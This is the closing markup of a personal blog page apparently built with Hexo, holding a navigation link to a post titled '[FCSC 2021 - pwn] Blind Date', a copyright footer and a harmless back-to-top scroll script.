  <a class="article-nav-btn right "
    
      href="/posts/blindate/"
      title="[FCSC 2021 - pwn] Blind Date"
     >

    <p class="title-text">
      
        [FCSC 2021 - pwn] Blind Date
        
    </p>
    <i class="fa-solid fa-angle-right"></i>
  </a>
</nav>


  
</article>

 
    </div>
    <div id="footer-wrapper">
      <footer id="footer">
  
  <div id="footer-info" class="inner">
    
    &copy; 2023 nasm<br>
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & Theme <a target="_blank" rel="noopener" href="https://github.com/saicaca/hexo-theme-vivia">Vivia</a>
  </div>
</footer>

    </div>
    <div class="back-to-top-wrapper">
    <button id="back-to-top-btn" class="back-to-top-btn" onclick="topFunction()">
        <span class="material-symbols-rounded">keyboard_arrow_up</span>
    </button>
</div>

<script>
    function topFunction() {
        window.scroll({ top: 0, behavior: 'smooth' });
    }
    let btn = document.getElementById('back-to-top-btn');
    function scrollFunction() {
        if (document.body.scrollTop > 600 || document.documentElement.scrollTop > 600) {
            btn.style.opacity = 1;
        } else {
            btn.style.opacity = 0;
        }
    }
    window.onscroll = function() {
        scrollFunction();
    }
</script>

  </div>
  <script src="/js/light-dark-switch.js"></script>
</body>
</html>
